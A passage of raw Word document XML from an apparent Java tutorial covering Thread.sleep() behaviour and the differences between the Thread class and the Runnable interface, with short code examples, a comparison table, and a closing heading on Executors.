      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the thread holds any lock, it does not release it during the sleep period. It will continue holding the lock until it wakes up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9271D3"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Can be Interrupted</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread sleeping via Thread.sleep() can be interrupted by another thread, which will throw an InterruptedException. If interrupted, the thread will stop sleeping and handle the exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5325B346"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Time Granularity</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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age:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EEDDB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SleepExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD86B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1E6A36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starts...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818713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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBC95B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leep for 3 seconds (3000 milliseconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C93B3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3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F198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A7CF90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was interrupted!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476B4D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A8DCE2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resumes after sleeping...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AEF5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2C743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B72F76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to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A4F09"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Thread.sleep() is </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and applies to the current thread, meaning it affects the thread that calls it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906E896"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common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in execution, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>polling</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or simulating real-world wait times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69156D93"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Interruptions</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the thread is interrupted while sleeping, an InterruptedException will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76198B3F"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Precision</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The actual sleep time may be slightly longer than requested, depending on the system's scheduling and clock granularity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFF0D6"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It Works Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C732D0"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Internally, when Thread.sleep() is invoked, the JVM interacts with the underlying operating system to suspend the thread for the specified time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F50CB6"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The thread enters the "sleep" state and is added to a queue managed by the operating system or the JVM for thread scheduling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F56FF8"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e specified sleep time is over, the thread is moved to a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meaning it is eligible to execute, but the JVM's thread scheduler may choose to execute it at a later time depending on thread priorities and system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D54C5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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38783310" w14:textId="4577A9CC" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00E0485A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="_Toc197867494"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Thread and Runnable in Java</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p w14:paraId="3C3D2297" w14:textId="762A741E" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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In Java, both Thread and Runnable are used for multi-threading, but they have distinct roles and characteristics. Here's a detailed explanation of the difference between Thread and Runnable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064C56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Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F61CB9"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Thread is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java that represents an individual thread of execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B894EF"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Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To create a thread using Thread, you need to either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743689B6"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Extend the Thread class</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and override the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DF2BE"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Or, you can create an instance of Thread and pass a Runnable object to the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286644F5"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Thread Lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It manages the lifecycle of the thread (such as starting, running, and finishing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76702E10"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Single Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since Java does not support multiple inheritance, if you extend Thread, you cannot extend any other class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A40B7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Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585853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4F95D5E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423C7E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25D37DD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is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EC11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893A85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3ACEE0A" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C34BB7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ThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E08A92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D4E5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 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F2AF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0D07FB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9BFEF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35ED23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Runnable Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3DD9B"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Runnable is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java with a single abstract method run(). It represents a task that can be executed by a thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A493163"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Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To create a thread using Runnable, you need to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F8980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Implement the Runnable interface</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and override the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC2D9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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Then, you create an instance of Thread, passing the Runnable object to its constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CC6ED"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Multiple Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since Runnable is an interface, a class can implement it while also extending another class, which gives more flexibility than extending Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388553B"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Runnable interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A77D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0E13A6C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2F110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5130F4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173D547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6DED60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DC611ED" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AA983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259DB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E0E09F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6BA0E6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 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB34F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11B17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766750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0A4327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4149"/>
        <w:gridCol w:w="4389"/>
      </w:tblGrid>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="11D61112" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="763187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52B0C02"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F78A17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r>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="33F0FEC6" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C5988A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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71DD2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read is a class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB9DA1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is an interface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="47D518B7" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F6AB7E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Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1E58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only </w:t>
            </w:r>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>extend Thread</w:t>
            </w:r>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (single inheritance).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33365E8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implement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nd extend another class (multiple inheritance).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="3EDAAEF2" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5521FCB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Representation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13EA042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hread of execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13AF158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ask that can be executed by a thread.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="75EC28BF" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="667642E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Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61F121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Less flexible due to single inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AADBB0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More flexible as it can be used with any class that implements Runnable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="07CC3982" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FE40C5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB94C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you want to create a thread directly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BF6D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to represent a task that can be passed to a thread for execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="439028D8" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40C6E1C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Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CF856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You can directly create a thread by extending Thread.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3E780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A Runnable object needs to be passed to a Thread object to create a thread.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="18EDD72D" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C7BC10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Memory Efficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02AA271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Each thread requires a separate Thread object, consuming more memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54AA00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can be used by multiple threads, consuming less memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="4213243D" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776498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Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="694A178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 itself is created by extending Thread, and the run() method is implemented inside it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A747E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allows for more flexible task delegation by separating the task from the thread creation logic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73620841"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12E3AC7D"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Thread when</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CE91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directly control thread creation and management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66DB3D"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don't need to extend any other class (because Java allows single inheritance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF5A2BB"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r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70A52B"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separate the task (logic) from the thread management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D362A"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flexibility, as a class can implement Runnable and still extend another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693D76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execute the same task with multiple threads (sharing the same Runnable instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB64DC"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want to avoid the overhead of extending Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501908B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with Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F2DB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Implementing Runnable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2338AC6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503AC1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792A0C9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5D3220B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671E3CA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E09147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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D636F4E" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB1B4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Extending Thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E717E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73177B2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66DBD83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B0187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task is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCC4F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DD084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36FBF" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D32D83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Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D8A0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10C5E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Runnable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E68E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5C4BCED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1 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C102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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813E15C" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB96D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Thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB145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2 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B162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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34225CF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55611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1F7BE0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4841C040"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Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class and is less flexible due to Java's single inheritance constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D792999"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an interface and allows greater flexibility, as it can be implemented by any class while still extending another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D9DF6"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generally preferred for implementing concurrent tasks due to its separation of task and thread management and better memory efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8248E1" w14:textId="482C12B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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B75354" w14:textId="4ED12D3D" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="004F4443">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="_Toc197867495"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is significance of Executors in Java</w:t>
      </w:r>
